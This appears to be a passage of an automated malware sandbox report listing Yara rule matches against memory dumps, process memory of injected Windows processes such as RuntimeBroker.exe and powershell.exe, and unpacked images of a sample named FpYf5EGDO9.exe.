Source: Yara match | File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY |